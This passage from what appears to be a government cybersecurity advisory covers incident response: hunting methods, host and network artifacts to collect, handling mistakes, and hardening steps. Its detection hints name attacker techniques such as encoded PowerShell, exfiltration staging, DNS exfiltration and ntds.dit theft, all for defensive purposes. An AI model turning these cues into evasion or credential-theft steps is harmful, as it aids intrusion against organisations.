procedures:\n\n * First, collect and remove for further analysis: \n * Relevant artifacts,\n * Logs, and\n * Data.\n * Next, implement mitigation steps that avoid tipping off the adversary that their presence in the network has been discovered.\n * Finally, consider soliciting incident response support from a third-party IT security organization to: \n * Provide subject matter expertise and technical support to the incident response,\n * Ensure that the actor is eradicated from the network, and\n * Avoid residual issues that could result in follow-up compromises once the incident is closed.\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\nThe incident response process requires a variety of technical approaches to uncover malicious activity. Incident responders should consider the following activities.\n\n * **Indicators of Compromise (IOC) Search** \u2013 Collect known-bad indicators of compromise from a broad variety of sources, and search for those indicators in network and host artifacts. Assess results for further indications of malicious activity to eliminate false positives.\n * **Frequency Analysis** \u2013 Leverage large datasets to calculate normal traffic patterns in both network and host systems. Use these predictive algorithms to identify activity that is inconsistent with normal patterns. Variables often considered include timing, source location, destination location, port utilization, protocol adherence, file location, integrity via hash, file size, naming convention, and other attributes.\n * **Pattern Analysis** \u2013 Analyze data to identify repeating patterns that are indicative of either automated mechanisms (e.g., malware, scripts) or routine human threat actor activity. Filter out the data containing normal activity and evaluate the remaining data to identify suspicious or malicious activity.\n * **Anomaly Detection** \u2013 Conduct an analyst review (based on the team\u2019s knowledge of, and experience with, system administration) of collected artifacts to identify errors. Review unique values for various datasets and research associated data, where appropriate, to find anomalous activity that could be indicative of threat actor activity.\n\n### Recommended Artifact and Information Collection\n\nWhen hunting and/or investigating a network, it is important to review a broad variety of artifacts to identify any suspicious activity that may be related to the incident. Consider collecting and reviewing the following artifacts throughout the investigation.\n\n#### **Host-Based Artifacts**\n\n * Running Processes\n * Running Services\n * Parent-Child Process Trees\n * Integrity Hash of Background Executables\n * Installed Applications\n * Local and Domain Users\n * Unusual Authentications\n * Non-Standard Formatted Usernames\n * Listening Ports and Associated Services\n * Domain Name System (DNS) Resolution Settings and Static Routes\n * Established and Recent Network Connections\n * Run Key and other AutoRun Persistence\n * Scheduled Tasks\n * Artifacts of Execution (Prefetch and Shimcache)\n * Event logs\n * Anti-virus detections\n\n#### **Information to Review for Host Analysis**\n\n * Identify any process that is not signed and is connecting to the internet looking for beaconing or significant data transfers.\n * Collect all PowerShell command line requests looking for Base64-encoded commands to help identify malicious fileless attacks.\n * Look for excessive `.RAR`, `7zip`, or `WinZip` processes, especially with suspicious file names, to help discover exfiltration staging (suspicious file names include naming conventions such as, `1.zip`, `2.zip`, etc.).\n * Collect all user logins and look for outlier behavior, such as a time of login that is out of the ordinary for the user or a login from an Internet Protocol (IP) address not normally used by the user.\n * On Linux/Unix operating systems (OSs) and services, collect all `cron` and `systemd /etc/passwd` files looking for unusual accounts and log files, such as accounts that appear to be `system / proc` users but have an interactive shell such as `/bin/bash` rather than `/bin/false/nologin`\n * On Microsoft OSs, collect Scheduled Tasks, Group Policy Objects (GPO), and Windows Management Instrumentation (WMI) database storage on hosts of interest looking for malicious persistence.\n * Use the Microsoft Windows Sysinternals Autoruns tool, which allows IT security practitioners to view\u2014and, if needed, easily disable\u2014most programs that automatically load onto the system.\n * Check the Windows registry and Volume Shadow Copy Service for evidence of intrusion.\n * Consider blocking script files like `.js`, `.vbs`, `.zip`, `.7z`, `.sfx` and even Microsoft Office documents or PDFs.\n * Collect any scripts or binary ELF files from `/dev/shm/tmp` and `/var/tmp`.\n * Kernel modules listed (lsmod) for signs of a rootkit; dmesg command output can show signs of rootkit loading and device attachment amongst other things.\n * Archive contents of `/var/log` for all hosts.\n * Archive output from journald. These logs are pretty much the same as /var/log; however, they provide some integrity checking and are not as easy to modify. This will eventually replace the /var/log contents for some aspects of the system. Check for additional Secure Shell (SSH) keys added to user\u2019s `authorized_keys`.\n\n#### **Network-Based Artifacts**\n\n * Anomalous DNS traffic and activity, unexpected DNS resolution servers, unauthorized DNS zone transfers, data exfiltration through DNS, and changes to host files\n * Remote Desktop Protocol (RDP), virtual private network (VPN) sessions, SSH terminal connections, and other remote abilities to evaluate for inbound connections, unapproved third-party tools, cleartext information, and unauthorized lateral movement\n * Uniform Resource Identifier (URI) strings, user agent strings, and proxy enforcement actions for abusive, suspicious, or malicious website access\n * Hypertext Transfer Protocol Secure/Secure Sockets Layer (HTTPS/SSL)\n * Unauthorized connections to known threat indicators\n * Telnet\n * Internet Relay Chat (IRC)\n * File Transfer Protocol (FTP)\n\n#### **Information to Review for Network Analysis**\n\n * Look for new connections on previously unused ports.\n * Look for traffic patterns related to time, frequency, and byte count of the connections.\n * Preserve proxy logs. Add in the URI parameters to the event log if possible.\n * Disable LLMNR on the corporate network; if unable to disable, collect LLMNR (UDP port 5355) and NetBIOS-NS (UDP port 137).\n * Review changes to routing tables, such as weighting, static entries, gateways, and peer relationships.\n\n### Common Mistakes in Incident Handling\n\nAfter determining that a system or multiple systems may be compromised, system administrators and/or system owners are often tempted to take immediate actions. Although well intentioned to limit the damage of the compromise, some of those actions have the adverse effect of:\n\n 1. Modifying volatile data that could give a sense of what has been done; and\n 2. Tipping the threat actor that the victim organization is aware of the compromise and forcing the actor to either hide their tracks or take more damaging actions (like detonating ransomware).\n\nBelow\u2014and partially listed in figure 1\u2014are actions to avoid taking and some of the consequence of taking such actions.\n\n * **Mitigating the affected systems before responders can protect and recover data**\n * This can cause the loss of volatile data such as memory and other host-based artifacts.\n * The adversary may notice and change their tactics, techniques, and procedures.\n * **Touching adversary infrastructure (Pinging, NSlookup, Browsing, etc.)**\n * These actions can tip off the adversary that they have been detected.\n * **Preemptively blocking adversary infrastructure**\n * Network infrastructure is fairly inexpensive. An adversary can easily change to new command and control infrastructure, and you will lose visibility of their activity.\n * **Preemptive credential resets**\n * Adversary likely has multiple credentials, or worse, has access to your entire Active Directory.\n * Adversary will use other credentials, create new credentials, or forge tickets.\n * **Failure to preserve or collect log data that could be critical to identifying access to the compromised systems**\n * If critical log types are not collected, or are not retained for a sufficient length of time, key information about the incident may not be determinable. Retain log data for at least one year.\n * **Communicating over the same network as the incident response is being conducted (ensure all communications are held out-of-band)**\n * **Only fixing the symptoms, not the root cause**\n * Playing \u201cwhack-a-mole\u201d by blocking an IP address\u2014without taking steps to determine what the binary is and how it got there\u2014leaves the adversary an opportunity to change tactics and retain access to the network.\n\n\n\nFigure 1: Common missteps to be avoided when responding to an incident\n\n### Mitigations\n\nThe following recommendations and best practices may be helpful during the investigation and remediation process. **Note:** Although this guidance provides best practices to mitigate common attack vectors, organizations should tailor mitigations to their network.\n\n#### **General Mitigation Guidance**\n\n##### **Restrict or Discontinue Use of FTP and Telnet Services**\n\nThe FTP and Telnet protocols transmit credentials in cleartext, which are susceptible to being intercepted. To mitigate this risk, discontinue FTP and Telnet services by moving to more secure file storage/file transfer and remote access services.\n\n * Evaluate business needs and justifications to host files on alternative Secure File Transfer Protocol (SFTP) or HTTPS-based public sites.\n * Use Secure Shell (SSH) for access to remote devices and servers.\n\n##### **Restrict or Discontinue Use of Non-approved VPN Services**\n\n * Investigate the business needs and justification for allowing traffic from non-approved VPN services.\n * Identify such services across the enterprise and develop measures to add the application and browser plugins that enable non-approved VPN services to the denylist.\n * Enhance endpoint monitoring to obtain visibility on devices with non-approved VPN services running. Enhanced endpoint monitoring and detection capabilities would enable an organization\u2019s IT security personnel to manage approved software as well as identify and remove any instances of unapproved software.\n\n##### **Shut down or Decommission Unused Services and Systems**\n\n * Cyber actors regularly identify servers that are out of date or end of life (EOL) to gain access to a network and perform malicious activities. These present easy and safe locations to maintain persistence on a network.\n * Often these services and servers are systems that have begun decommissioning, but the final stage has not been completed by shutting down the system. This means they are still running and vulnerable to compromise.\n * Ensuring that decommissioning of systems has been completed or taking appropriate action to remove them from the network limits their susceptibility and reduces the investigative surface to be analyzed.\n\n##### **Quarantine and Reimage Compromised Hosts**\n\n**Note:** proceed with caution to avoid the adverse effects detailed in the Common Mistakes in Incident Handling section above.\n\n * Reimage or remove any compromised systems found on the network.\n * Monitor and educate users to be cautious of any downloads from third-party sites or vendors.\n * Block the known bad domains and add a web content filtering capability to block malicious sites by category to prevent future compromise.\n * Sanitize removable media and investigate network shares accessible by users.\n * Improve existing network-based malware detection tools with sandboxing capabilities.\n\n##### **Disable Unnecessary Ports, Protocols, and Services**\n\n * Identify and disable ports, protocols, and services not needed for official business to prevent would-be attackers from moving laterally to exploit vulnerabilities. This includes external communications as well as communications between networks.\n * Document allowed ports and protocols at the enterprise level.\n * Restrict inbound and outbound access to ports and protocols not justified for business use.\n * Restrict allowed access list to assets justified by business use.\n * Enable a firewall log for inbound and outbound network traffic as well as allowed and denied traffic.\n\n##### **Restrict or Disable Interactive Login for Service Accounts**\n\nService accounts are privileged accounts dedicated to certain services to perform activities related to the service or application without being tied to a single domain user. Given that services tend to be privileged accounts and thereby have administrative privileges, they are often a target for attackers aiming to obtain credentials. Interactive login to a service account not directly tied to an end-user account makes it difficult to identify accountability during cyber incidents.\n\n * Audit the Active Directory (AD) to identify and document active service accounts.\n * Restrict use of service accounts using AD group policy.\n * Disallow interactive login by adding service account to a group of non-interactive login users.\n * Continuously monitor service account activities by enhancing logging.\n * Rotate service accounts and apply password best practices without service, degradation, or disruption.\n\n##### **Disable Unnecessary Remote Network Administration Tools**\n\n * If an attacker (or malware) gains access to a remote user\u2019s computer, steals authentication data (login/password), hijacks an active remote administration session, or successfully attacks a vulnerability in the remote administration tool\u2019s software, the attacker (or malware) will gain unrestricted control of the enterprise network environment. Attackers can use compromised hosts as a relay server for reverse connections, which could enable them to connect to these remote administration tools from anywhere.\n * Remove all remote administration tools that are not required for day-to-day IT operations. Closely monitor and log events for each remote-control session required by department IT operations.\n\n##### **Manage Unsecure Remote Desktop Services**\n\nAllowing unrestricted RDP access can increase opportunities for malicious activity such as on path and Pass-the-Hash (PtH) attacks.\n\n * Implement secure remote desktop gateway solutions.\n * Restrict RDP service trust across multiple network zones.\n * Implement privileged account monitoring and short time password lease for RDP service use.\n * Implement enhanced and continuous monitoring of RDP services by enabling logging and ensure RDP logins are captured in the logs.\n\n##### **Credential Reset and Access Policy Review**\n\nCredential resets need to be done to strategically ensure that all the compromised accounts and devices are included and to reduce the likelihood that the attacker is able to adapt in response to this.\n\n * Force password resets; revoke and issue new certificates for affected accounts/devices.\n * If it is suspected that the attacker has gained access to the Domain Controller, then the passwords for all local accounts\u2014such as Guest, HelpAssistant, DefaultAccount, System, Administrator, and `kbrtgt`\u2014should be reset. It is essential that the password for the `kbrtgt` account is reset as this account is responsible for handling Kerberos ticket requests as well as encrypting and signing them. The account should be reset twice (as the account has a two-password history). \n * The first account reset for the `kbrtgt` needs to be allowed to replicate prior to the second reset to avoid any issues.\n * If it is suspected that the `ntds.dit` file has been exfiltrated, then all domain user passwords will need to be reset.\n * Review access policies to temporarily revoke privileges/access for affected accounts/devices. If it is necessary to not alert the attacker (e.g., for intelligence purposes), then privileges can be reduced for affected accounts/devices to \u201ccontain\u201d them.\n\n##### **Patch Vulnerabilities**\n\nAttackers frequently exploit software or hardware vulnerabilities to gain access to a targeted system.\n\n * Known vulnerabilities in external facing devices and servers should be patched immediately, starting with the point of compromise, if known. \n * Ensure external-facing devices have not been previously compromised while going through the patching process.\n * If the point of compromise (i.e., the specific software, device, server) is known, but how the software, device, or server was exploited is unknown, notify the vendor so they can begin analysis and develop a new patch.\n * Follow vendor remediation guidance including the installation of new patches as soon as they become available.\n\n#### **General Recommendations and Best Practices Prior to an Incident**\n\nProperly implemented defensive techniques and programs make it more difficult for a threat actor to gain access to a network and remain persistent yet undetected. When an effective defensive program is in place, attackers should encounter complex defensive barriers. Attacker activity should also trigger detection and prevention mechanisms that enable organizations to identify, contain, and respond to the intrusion quickly. There is no single technique, program, or set of defensive techniques or programs that will completely prevent all attacks. The network administrator should adopt and implement multiple defensive techniques and programs in a layered approach to provide a complex barrier to entry, increase the likelihood of detection, and decrease the likelihood of a successful attack. This layered mitigation approach is known as defense-in-depth.\n\n##### **User Education**\n\nEnd users are the frontline security of the organizations. Educating them in security principles as well as actions to take and not take during an incident will increase the organization\u2019s resilience and might prevent easily avoidable compromises.\n\n * Educate users to be cautious of any downloads from third-party sites or vendors.\n * Train users on recognizing phishing emails. There are several systems and services (free and otherwise) that can be deployed or leveraged.\n * Train users on identifying which groups/individuals to contact when they suspect an incident.\n * Train users on the actions they can and cannot take if they suspect an incident and why (some users will attempt to remediate and might make things worst).\n\n##### **Allowlisting**\n\n * Enable application directory allowlisting through Microsoft Software Restriction Policy or AppLocker.\n * Use directory allowlisting rather than attempting to list every possible permutation of applications in a network environment. Safe defaults allow applications to run from `PROGRAMFILES`, `PROGRAMFILES(X86)`, and `SYSTEM32`. Disallow all other locations unless an exception is granted.\n * Prevent the execution of unauthorized software by using application allowlisting as part of the OS installation and security hardening process.\n\n##### **Account Control**\n\n * Decrease a threat actor\u2019s ability to access key network resources by implementing the principle of least privilege.\n * Limit the ability of a local administrator account to log in from a local interactive session (e.g., Deny access to this computer from the network) and prevent access via an RDP session.\n * Remove unnecessary accounts and groups; restrict root access.\n * Control and limit local administration; e.g. implementing Just Enough Administration (JEA), just-in-time (JIT) administration, or enforcing PowerShell Constrained Language mode via a User Mode Code Integrity (UMCI) policy.\n * Make use of the Protected Users Active Directory group in Windows domains to further secure privileged user accounts against pass-the-hash attacks.\n\n##### **Backups**\n\n * Identify what data is essential to keeping operations running; make regular backup copies.\n * Test that backups are working to ensure they can restore the data in the event of an incident.\n * Create offline backups to help recover from a ransomware attack or from disasters (fire, flooding, etc.).\n * Securely store offline backups at an offsite location. If feasible, choose an offsite location that is at a distance from the primary location that would be unaffected in the event of a regional natural disaster.\n\n##### **Workstation Management**\n\n * Create and deploy a secure system baseline image to all workstations.\n * Mitigate potential exploitation by threat actors by following a normal patching cycle for all OSs, applications, and software, with exceptions for emergency patches.\n * Apply asset and patch management processes.\n * Reduce the number of cached credentials to one (if a laptop) or zero (if a desktop or fixed asset).\n\n##### **Host-Based Intrusion Detection / Endpoint Detection and Response**\n\n * Configure and monitor workstation system logs through a host-based endpoint detection and response platform and firewall.\n * Deploy an anti-malware solution on workstations to prevent spyware, adware, and malware as part of the OS security baseline. \n * Ensure that your anti-malware solution remains up to date.\n * Monitor antivirus scan results on a regular basis.\n\n##### **Server Management**\n\n * Create a secure system baseline image and deploy it to all servers.\n * Upgrade or decommission end-of-life non-Windows servers.\n * Upgrade or decommission servers running Windows Server 2003 or older versions.\n * Implement asset and patch management processes.\n * Audit for and disable unnecessary services.\n\n##### **Server Configuration and Logging**\n\n * Establish remote server logging and retention.\n * Reduce the number of cached credentials to zero.\n * Configure and monitor system logs via a centralized security information and event management (SIEM) appliance.\n * Add an explicit `DENY` for `%USERPROFILE%`.\n * Restrict egress web traffic from servers.\n * In Windows environments, use Restricted Admin mode or remote credential guard to further secure remote desktop sessions against pass-the-hash attacks.\n * Restrict anonymous shares.\n * Limit remote access by only using jump servers for such access.\n * On Linux, use SELINUX or AppArmor in enforcing mode and/or turn on audit logging.\n * Turn on bash shell logging; ship this and all logs to a remote server.\n * Do not allow users to use `su`. Use `Sudo -l` instead.\n * Configure automatic updates in yum or apt.\n * Mount `/var/tmp` and `/tmp` as `noexec`.\n\n##### **Change Control**\n\n * Create a change control process for all implemented changes.\n\n##### **Network Security**\n\n * Implement an intrusion detection system (IDS). \n * Apply continuous monitoring.\n * Send alerts to a SIEM tool.\n * Monitor internal activity (this tool may use the same tap points as the netflow generation tools).\n * Employ netflow capture. \n * Set a minimum retention period of 180 days.\n * Capture netflow on all ingress and egress points of network segments, not just at the Managed Trusted Internet Protocol Services or Trusted Internet Connections locations.\n * Capture all network traffic \n * Retain captured traffic for a minimum of 24 hours.\n * Capture traffic on all ingress and egress points of the network.\n * Use VPN \n * Maintain site-to-site VPN with customers and vendors.\n * Authenticate users utilizing site-to-site VPNs.\n * Use authentication, authorization, and accounting for controlling network access.\n * Require smartcard authentication to an HTTPS page in order to control access. Authentication should also require explicit rostering of permitted smartcard distinguished names to enhance the security posture on both networks participating in the site-to-site VPN.\n * Establish appropriate secure tunneling protocol and encryption.\n * Strengthen router configuration (e.g., avoid enabling remote management over the internet and using default IP ranges, automatically log out after configuring routers, and use encryption.).\n * Turn off Wi-Fi protected setup, enforce the use of strong passwords, and keep router firmware up-to-date.\n * Improve firewall security (e.g., enable automatic updates, revise firewall rules as appropriate, implement allowlists, establish packet filtering, enforce the use of strong passwords, encrypt networks). \n * Whenever possible, ensure access to network devices via external or untrusted networks (specifically the internet) is disabled.\n * Manage access to the internet (e.g., providing internet access from only devices/accounts that need it, proxying all connections, disabling internet access for privileged/administrator accounts, enabling policies that restrict internet access using a blocklist, a resource allowlist, content type, etc.) \n * Conduct regular vulnerability scans of the internal and external networks and hosted content to identify and mitigate vulnerabilities.\n * Define areas within the network that should be segmented to increase the visibility of lateral movement by a threat and increase the defense-in-depth posture.\n * Develop a process to block traffic to IP addresses and domain names that have been identified as being used to aid previous attacks.\n * Evaluate and consider the security configurations of Microsoft Office 365 (O365) and other cloud collaboration service platforms prior to deployment. \n * Use multi-factor authentication. This is the best mitigation technique to protect against credential theft for O365 administrators and users.\n * Protect Global Admins from compromise and use the principle of \u201cLeast Privilege.\u201d\n * Enable unified audit logging in the Security and Compliance Center.\n * Enable alerting capabilities.\n * Integrate with organizational SIEM solutions.\n * Disable legacy email protocols, if not required, or limit their use to specific users.\n\n##### **Network Infrastructure Recommendations**\n\n * Create a secure system baseline image and deploy it to all networking equipment (e.g., switches, routers, firewalls).\n * Remove unnecessary OS files from the internetwork operating system (IOS). This will limit the possible targets of persistence (i.e., files to embed malicious code) if the device is compromised and will align with National Security Agency Network Device Integrity best practices.\n * Remove vulnerable IOS OS files (i.e., older iterations) from the device\u2019s boot variable (i.e., show boot or show bootvar).\n * Update to the latest available operating system for IOS devices.\n * On devices with a Secure Sockets Layer VPN enabled, routinely verify customized web objects against the organization\u2019s known good files for such VPNs, to ensure the devices remain free of unauthorized modification.\n * Ensure that any incident response tools that point to external domains are either removed or updated to point to internal security tools. If this is not done and an external domain to which a tool points expires, a malicious threat actor may register it and start collecting telemetry from the infrastructure.\n\n##### **Host Recommendations**\n\n * Implement policies to block workstation-to-workstation RDP connections through a Group Policy Object on Windows, or by a similar mechanism.\n * Store system logs of mission critical systems for at least one year within a SIEM tool.\n * Review the configuration of application logs to verify that recorded fields will contribute to an incident response investigation.\n\n##### **User Management**\n\n * Reduce the number of domain and enterprise administrator accounts.\n * Create non-privileged accounts for privileged users and ensure they use the non- privileged accounts for all non-privileged access (e.g., web browsing, email access).\n * If possible, use technical methods to detect or prevent browsing by privileged accounts (authentication to web proxies would enable blocking of Domain Administrators).\n * Use two-factor authentication (e.g., security tokens for remote access and access to any sensitive data repositories).\n * If soft tokens are used, they should not exist on the same device that is requesting remote access (e.g., a laptop) and instead should be on a smartphone, token, or other out-of-band device.\n * Create privileged role tracking.\n * Create a change control process for all privilege escalations and role changes on user accounts.\n * Enable alerts on privilege escalations and role changes.\n * Log privileged user changes in the network environment and create an alert for unusual events.\n * Establish least privilege controls.\n * Implement a security-awareness training program.\n\n##### **Segregate Networks and Functions**\n\nProper network segmentation is a very effective security mechanism to prevent an intruder from propagating exploits or laterally moving around an internal network. On a poorly segmented network, intruders are able to extend their impact to control critical devices or gain access to sensitive data and intellectual property. Security architects must consider the overall infrastructure layout, segmentation, and segregation. Segregation separates network segments based on role and functionality. A securely segregated network can contain malicious occurrences, reducing the impact from intruders, in the event that they have gained a foothold somewhere inside the network.\n\n###### **Physical Separation of Sensitive Information**\n\nLocal Area Network (LAN) segments are separated by traditional network devices such as routers. Routers are placed between networks to create boundaries, increase the number of broadcast domains, and effectively filter users\u2019 broadcast traffic. These boundaries can be used to contain security breaches by restricting traffic to separate segments and can even shut down segments of the network during an intrusion, restricting adversary access.\n\nRecommendations:\n\n * Implement Principles of Least Privilege and need-to-know when designing network segments.\n * Separate sensitive information and security requirements into network segments.\n * Apply security recommendations and secure configurations to all network segments and network layers.\n\n###### **Virtual Separation of Sensitive Information**\n\nAs technologies change, new strategies are developed to improve IT efficiencies and network security controls. Virtual separation is the logical isolation of networks on the same physical network. The same physical segmentation design principles apply to virtual segmentation but no additional hardware is required. Existing technologies can be used to prevent an intruder from breaching other internal network segments.\n\nRecommendations:\n\n * Use Private Virtual LANs to isolate a user from the rest of the broadcast domains.\n * Use Virtual Routing and Forwarding (VRF) technology to segment network traffic over multiple routing tables simultaneously on a single router.\n * Use VPNs to securely extend a host/network by tunneling through public or private networks.\n\n#### **Additional Best Practices**\n\n * Implement a vulnerability assessment and remediation program.\n * Encrypt all sensitive data in transit and at rest.\n * Create an insider threat program.\n * Assign additional personnel to review logging and alerting data.\n * Complete independent security (not compliance) audits.\n * Create an information sharing program.\n * Complete and maintain network and system documentation to aid in timely incident response, including: \n * Network diagrams,\n * Asset owners,\n * Type of asset, and\n * An up-to-date incident response plan.\n\n### Resources\n\n * [CISA Insights](<https://www.cisa.gov/insights>)\n * [CISA Alert: